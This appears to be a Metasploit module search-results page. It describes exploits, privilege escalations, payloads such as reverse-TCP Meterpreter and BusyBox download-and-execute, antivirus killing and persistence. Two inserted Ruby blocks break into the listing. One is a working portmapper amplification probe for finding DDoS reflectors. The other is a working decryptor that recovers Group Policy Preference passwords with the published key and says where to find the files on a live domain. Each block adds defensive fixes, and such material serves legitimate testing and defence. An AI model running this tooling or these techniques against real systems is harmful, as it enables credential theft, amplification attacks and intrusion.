6845 matches found
Watchguard XCS Remote Command Execution
This module exploits two separate vulnerabilities found in the Watchguard XCS virtual appliance to gain command execution. By exploiting an unauthenticated SQL injection, a remote attacker may insert a valid web user into the appliance database, and get access to the web interface. On the other...
Android Mercury Browser Intent URI Scheme and Directory Traversal Vulnerability
This module exploits an unsafe intent URI scheme and directory traversal found in Android Mercury Browser version 3.2.3. The intent allows the attacker to invoke a private wifi manager activity, which starts a web server for Mercury on port 8888. The webserver also suffers a directory traversal...
ManageEngine EventLog Analyzer Remote Code Execution
This module exploits a SQL query functionality in ManageEngine EventLog Analyzer v10.6 build 10060 and previous versions. Every authenticated user, including the default "guest" account can execute SQL queries directly on the underlying Postgres database server. The queries are executed as the...
Portmapper Amplification Scanner
This module can be used to discover Portmapper services that can be abused in an amplification DDoS attack against a third party. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
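The check behind that scanner is a single unauthenticated UDP request: a 40-byte PMAPPROC_DUMP call (program 100000, version 2, procedure 4) to which the portmapper answers with every registered program, so the reply size divided by the request size is the bandwidth amplification factor. The following is an added example written for this page, not the Metasploit module's own code, implementing that exchange with the standard ONC RPC v2 wire format; the live probe assumes a host reachable on UDP 111 and is not exercised offline, while the reply used for the demonstration is constructed inline.

```ruby
require 'socket'

# ONC RPC v2 constants for the portmapper (program 100000, version 2).
# PMAPPROC_DUMP (proc 4) returns every registered (prog, vers, prot, port)
# mapping, which is why a 40-byte UDP request can draw a much larger reply.
PMAP_PROG     = 100_000
PMAP_VERS     = 2
PMAPPROC_DUMP = 4
RPC_CALL      = 0
RPC_REPLY     = 1
AUTH_NULL     = 0

# Build the 40-byte PMAPPROC_DUMP call: RPC header, null credentials, null verifier.
def build_dump_request(xid)
  [xid, RPC_CALL, 2, PMAP_PROG, PMAP_VERS, PMAPPROC_DUMP,
   AUTH_NULL, 0,            # credentials: flavor, body length
   AUTH_NULL, 0].pack('N*') # verifier:    flavor, body length
end

# Parse a PMAPPROC_DUMP reply into an array of mapping hashes. Returns nil
# unless the reply is an accepted, successful RPC reply for our xid.
def parse_dump_reply(xid, data)
  return nil if data.bytesize < 24
  rxid, mtype, rstat, _vflavor, vlen, astat = data.unpack('N6')
  return nil unless rxid == xid && mtype == RPC_REPLY && rstat == 0 && astat == 0
  off = 24 + vlen            # skip the verifier body (0 bytes for AUTH_NULL)
  mappings = []
  loop do
    return nil if off + 4 > data.bytesize
    value_follows = data[off, 4].unpack1('N')   # XDR optional-data flag
    off += 4
    break if value_follows.zero?
    return nil if off + 16 > data.bytesize
    prog, vers, prot, port = data[off, 16].unpack('N4')
    off += 16
    mappings << { prog: prog, vers: vers, prot: prot, port: port }
  end
  mappings
end

# Bandwidth amplification factor: reply bytes per request byte.
def amplification_factor(request, reply)
  (reply.bytesize.to_f / request.bytesize).round(2)
end

# Encode a DUMP reply the way a portmapper does; used here only to build
# constructed test data, since the demonstration runs offline.
def build_dump_reply(xid, mappings)
  head = [xid, RPC_REPLY, 0, AUTH_NULL, 0, 0].pack('N*')
  body = mappings.map { |m| [1, m[:prog], m[:vers], m[:prot], m[:port]].pack('N*') }.join
  head + body + [0].pack('N')
end

# Live probe (assumed target on UDP 111; not exercised offline): returns the
# registered mappings and the measured amplification factor, or nil on no reply.
def probe_portmapper(host, timeout = 3)
  xid = rand(1 << 32)
  req = build_dump_request(xid)
  sock = UDPSocket.new
  sock.send(req, 0, host, 111)
  return nil unless IO.select([sock], nil, nil, timeout)
  reply, _addr = sock.recvfrom(65_535)
  maps = parse_dump_reply(xid, reply)
  maps && { mappings: maps, factor: amplification_factor(req, reply) }
ensure
  sock&.close
end

if __FILE__ == $0
  # Constructed reply: three registrations (portmapper over tcp and udp, NFSv3 over udp).
  xid = 0x1234abcd
  req = build_dump_request(xid)
  reply = build_dump_reply(xid, [
    { prog: 100_000, vers: 2, prot: 6,  port: 111 },
    { prog: 100_000, vers: 2, prot: 17, port: 111 },
    { prog: 100_003, vers: 3, prot: 17, port: 2049 }
  ])
  puts "request #{req.bytesize} bytes, reply #{reply.bytesize} bytes, factor #{amplification_factor(req, reply)}"
  parse_dump_reply(xid, reply).each do |m|
    puts "prog=#{m[:prog]} vers=#{m[:vers]} prot=#{m[:prot]} port=#{m[:port]}"
  end
end
```

The factor grows with the number of registered RPC programs, so a host with many NFS/NIS services registered amplifies far more than the three-entry sample; the same parser also tells you which services are exposed, which is the useful output when you run the probe against your own range. The defensive fix is to stop answering portmapper over UDP from untrusted networks (firewall 111/udp or bind rpcbind to trusted interfaces), not to tune the reply.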
MS15-100 Microsoft Windows Media Center MCL Vulnerability
This module exploits a vulnerability in Windows Media Center. By supplying a UNC path in the .mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution.
Nibbleblog File Upload Vulnerability
Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3.
CMS Bolt File Upload Vulnerability
Bolt CMS contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 2.2.4.
Simple Backdoor Shell Remote Code Execution
This module exploits unauthenticated simple web backdoor shells by leveraging the common backdoor shell's vulnerable parameter to execute commands. The SecLists project of Daniel Miessler and Jason Haddix has many samples of this kind of backdoor shell, categorized under Payloads...
MS15-078 Microsoft Windows Font Driver Buffer Overflow
This module exploits a pool-based buffer overflow in the atmfd.dll driver when parsing a malformed font. The vulnerability was exploited by Hacking Team and disclosed in the July 2015 data leak. This module has been tested successfully on vulnerable builds of Windows 8.1 x64.
Jenkins-CI Unauthenticated Script-Console Scanner
This module scans for unauthenticated Jenkins-CI script consoles and executes the specified command.
WordPress NextGEN Gallery Directory Read Vulnerability
This module exploits an authenticated directory traversal vulnerability in WordPress Plugin "NextGEN Gallery" version 2.1.7, allowing arbitrary directories to be listed with the web server's privileges.
UPnP IGD SOAP Port Mapping Utility
Manage port mappings on a UPnP IGD-capable device using the AddPortMapping and DeletePortMapping SOAP requests.
BusyBox DMZ Configuration
This module will be applied on a session connected to a BusyBox shell. It allows managing traffic forwarding to a target host through the BusyBox device.
BusyBox DNS Configuration
This module will be applied on a session connected to a BusyBox shell. It allows setting the DNS server on the device running BusyBox so that it is handed out by the device's DHCP server to network hosts.
BusyBox Download and Execute
This module will be applied on a session connected to a BusyBox shell. It will use wget to download a file to the device running BusyBox and execute it there.
BusyBox SMB Sharing
This module will be applied on a session connected to a BusyBox shell. It will modify the SMB configuration of the device running BusyBox to share the root directory of the device.
BusyBox Ping Network Enumeration
This module will be applied on a session connected to a BusyBox shell. It will ping a range of IP addresses from the router or device running BusyBox.
BusyBox Jailbreak
This module will send a set of commands to an open session that is connected to a BusyBox limited shell, i.e. a router's restricted shell. It will try different known tricks to jailbreak the limited shell and get a full BusyBox shell.
BusyBox Enumerate Host Names
This module will be applied on a session connected to a BusyBox shell. It will enumerate host names related to the device running BusyBox.
BusyBox Enumerate Connections
This module will be applied on a session connected to a BusyBox shell. It will enumerate the connections established with the router or device running BusyBox.
Windows Gather Active Directory Groups
This module will enumerate AD groups on the specified domain.
Android Meterpreter Browsable Launcher
This module allows you to open an Android Meterpreter via a browser. An Android Meterpreter must be installed as an application beforehand on the target device in order to use this. For best results, you can consider using auxiliary/client/sms/send_text to trick your target into opening the...
PHP Meterpreter, Reverse TCP Inline
Connect back to the attacker and spawn a PHP Meterpreter server.
w3tw0rk / Pitbul IRC Bot Remote Code Execution
This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot.
Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
This module will bypass Windows UAC by utilizing the missing .manifest on the script host cscript.exe/wscript.exe binaries.
Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow
This module exploits an SEH overflow in Konica Minolta FTP Server 1.00. Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which leads to an SEH overflow. Konica FTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability...
Mac OS X "tpwn" Privilege Escalation
This module exploits a null pointer dereference in XNU to escalate privileges to root. Tested on 10.10.4 and 10.10.5.
Firefox PDF.js Privileged Javascript Injection
This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability.
Firefox PDF.js Browser File Theft
This module abuses an XSS vulnerability in versions prior to Firefox 39.0.3, Firefox ESR 38.1.1, and Firefox OS 2.2 that allows arbitrary files to be stolen. The vulnerability occurs in the PDF.js component, which uses JavaScript to render a PDF inside a frame with privileges to read local files...
Watermark Master Buffer Overflow (SEH)
This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when processing a specially crafted .WCF file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of Watermark Master to open a malicious .WCF...
Multi Recon Local Exploit Suggester
This module suggests local Meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform on which the user has a shell open, as well as the exploits available in Meterpreter. It's important to note that not all local exploits will be fired. Exploits are...
VideoCharge Studio Buffer Overflow (SEH)
This module exploits a stack-based buffer overflow in VideoCharge Studio 2.12.3.685 when processing a specially crafted .VSC file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of VideoCharge Studio to open a malicious...
WordPress Mobile Pack Information Disclosure Vulnerability
This module exploits an information disclosure vulnerability in WordPress Plugin "WP Mobile Pack" version 2.1.2, allowing files containing privileged information to be read.
WordPress Subscribe Comments File Read Vulnerability
This module exploits an authenticated directory traversal vulnerability in WordPress Plugin "Subscribe to Comments" version 2.1.2, allowing arbitrary files to be read with the web server's privileges.
Symantec Endpoint Protection Manager Authentication Bypass and Code Execution
This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities include an authentication bypass, a directory traversal and a privilege escalation to get privileged code execution...
BIND TKEY Query Denial of Service
This module sends a malformed TKEY query, which exploits an error in handling TKEY queries on affected BIND9 'named' DNS servers. As a result, a vulnerable named server will exit with a REQUIRE assertion failure. This condition can be exploited in BIND versions from 9.1.0 through 9.8.x...
Heroes of Might and Magic III .h3m Map file Buffer Overflow
This module embeds an exploit into an uncompressed map file .h3m for Heroes of Might and Magic III. Once the map is started in-game, a buffer overflow occurring when loading object sprite names leads to shellcode execution.
SMB Group Policy Preference Saved Passwords Enumeration
This module enumerates files from target domain controllers and connects to them via SMB. It then looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsoft's public AES key. This module has been tested successfully on a Win2k...
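The decryption step described above is the whole weakness: the AES-256 key that protects the cpassword attribute was published by Microsoft in the MS-GPPREF specification, so any domain user who can read SYSVOL can recover the plaintext. The following is an added example written for this page, not the Metasploit module's own code; it takes the key from MS-GPPREF, uses a zero IV and UTF-16LE plaintext as the format specifies, and runs over a constructed Groups.xml whose cpassword is the widely circulated sample value (it decrypts to Local*P4ssword!). The encrypt helper exists only to build additional test vectors. A regex is used to pull attributes so the block stays stand-alone; use REXML or Nokogiri on real SYSVOL files.

```ruby
require 'openssl'
require 'base64'

# The AES-256 key published in MS-GPPREF (section 2.2.1.1.4, Password Encryption).
# Every GPP cpassword in every domain is encrypted with it, so the field is
# equivalent to plaintext for anyone who can read SYSVOL. The IV is 16 zero bytes.
GPP_AES_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*')
GPP_AES_IV  = "\x00" * 16

# cpassword values are stored as base64 with the '=' padding stripped; restore it.
def gpp_repad(b64)
  b64 + '=' * ((4 - b64.length % 4) % 4)
end

# AES-256-CBC decrypt, then convert the UTF-16LE plaintext GPP stores to UTF-8.
def decrypt_cpassword(cpassword)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.decrypt
  cipher.key = GPP_AES_KEY
  cipher.iv  = GPP_AES_IV
  plain = cipher.update(Base64.strict_decode64(gpp_repad(cpassword))) + cipher.final
  plain.force_encoding('UTF-16LE').encode('UTF-8')
end

# Inverse of the above; GPP never needs it, it is here to build test vectors.
def encrypt_cpassword(password)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.encrypt
  cipher.key = GPP_AES_KEY
  cipher.iv  = GPP_AES_IV
  raw = cipher.update(password.encode('UTF-16LE').b) + cipher.final
  Base64.strict_encode64(raw).delete('=')
end

# Pull (account, password) pairs from a preference XML file. Groups.xml uses
# userName, Services.xml uses accountName, ScheduledTasks.xml uses runAs.
# A regex over <Properties .../> keeps this stand-alone; prefer a real XML parser.
def extract_gpp_credentials(xml)
  xml.scan(/<Properties\b[^>]*>/).filter_map do |props|
    cp = props[/\bcpassword="([^"]*)"/, 1]
    next if cp.nil? || cp.empty?
    user = props[/\b(?:userName|accountName|runAs)="([^"]*)"/, 1]
    { user: user, password: decrypt_cpassword(cp) }
  end
end

# Constructed Groups.xml in the SYSVOL layout (clsid/uid attributes omitted);
# the cpassword is the widely circulated sample value, not a real credential.
SAMPLE_GROUPS_XML = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <Groups>
    <User name="backupadmin" image="2" changed="2015-09-01 10:00:00">
      <Properties action="U" newName="" fullName="" description="constructed sample" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="backupadmin"/>
    </User>
  </Groups>
XML

if __FILE__ == $0
  extract_gpp_credentials(SAMPLE_GROUPS_XML).each do |c|
    puts "#{c[:user]}: #{c[:password]}"
  end
end
```

On a real engagement the inputs are \\<dc>\SYSVOL\<domain>\Policies\*\{Machine,User}\Preferences\*\*.xml; the fix on the defender's side is to remove every cpassword-bearing preference (MS14-025 stops creating new ones but does not delete existing files) and rotate the exposed accounts.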
Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation
In Apple OS X 10.10.4 and prior, the DYLD_PRINT_TO_FILE environment variable is used for redirecting logging data to a file instead of stderr. Due to a design error, this feature can be abused by a local attacker to write arbitrary files as root via restricted, SUID-root binaries.
Sticky Keys Persistence Module
This module makes it possible to apply the 'sticky keys' hack to a session with appropriate rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting for certain...
SysAid Help Desk 'rdslogs' Arbitrary File Upload
This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4. The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated file uploads and handles zip file contents in an insecure way. By combining both weaknesses, a remote attacker can accomplish...
WordPress All-in-One Migration Export
This module allows you to export WordPress data such as the database, plugins, themes, uploaded files, etc. via the All-in-One Migration plugin without authentication.
OpenSSL Alternative Chains Certificate Forgery MITM Proxy
This module exploits a logic error in OpenSSL by impersonating the server and sending a specially-crafted chain of certificates, resulting in certain checks on untrusted certificates being bypassed on the client, allowing it to use a valid leaf certificate as a CA certificate to sign a fake...
Windows Post Kill Antivirus and Hips
This module attempts to locate and terminate any processes that are identified as being Antivirus or Host-based IPS related.
Adobe Flash opaqueBackground Use After Free
This module exploits a use-after-free in Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as a use-after-free while handling the opaqueBackground property setter of the flash.display.DisplayObject class. This...
VNC Keyboard Remote Code Execution
This module exploits VNC servers by sending virtual keyboard keys and executing a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager payload is typed and executed. On Unix/Linux systems an xterm terminal is opened and a payload is typed and executed.
X11 Keyboard Command Injection
This module exploits open X11 servers by connecting and registering a virtual keyboard. The virtual keyboard is used to open an xterm or gnome terminal and type and execute the specified payload.
Western Digital Arkeia Remote Code Execution
This module exploits a code execution flaw in Western Digital Arkeia version 11.0.12 and below. The vulnerability exists in the 'arkeiad' daemon listening on TCP port 617. Because there are insufficient checks on the authentication of all clients, this can be bypassed. Using the ARKFS_EXEC_CMD...
Accellion FTA 'statecode' Cookie Arbitrary File Read
This module exploits a file disclosure vulnerability in the Accellion File Transfer appliance. This vulnerability is triggered when a user-provided 'statecode' cookie parameter is appended to a file path that is processed as an HTML template. By prepending this cookie with directory traversal...
Accellion FTA getStatus verify_oauth_token Command Execution
This module exploits a metacharacter shell injection vulnerability in the Accellion File Transfer appliance. This vulnerability is triggered when a user-provided 'oauth_token' is passed into a system call within a mod_perl handler. This module exploits the '/tws/getStatus' endpoint. Other vulnerable...